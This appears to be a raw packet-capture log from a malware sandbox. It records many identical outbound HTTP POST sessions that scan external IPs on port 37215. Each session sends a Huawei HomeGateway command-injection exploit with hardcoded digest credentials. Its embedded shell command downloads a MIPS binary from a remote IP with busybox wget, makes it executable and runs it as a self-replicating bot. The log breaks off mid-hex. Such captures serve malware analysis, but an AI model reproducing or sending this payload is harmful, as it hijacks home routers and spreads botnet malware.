                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1549192.168.2.136015241.161.151.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502424002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1550192.168.2.1347910157.97.243.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502429962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1551192.168.2.1360542126.82.249.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502486944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1552192.168.2.133732441.162.39.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502535105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1553192.168.2.1339132157.245.201.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502556086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1554192.168.2.135232441.86.33.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502610922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1555192.168.2.135962241.160.24.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502734900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1556192.168.2.1349014157.246.218.14537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502742052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1557192.168.2.134664279.60.109.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502824068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1558192.168.2.135955641.123.40.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502830029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 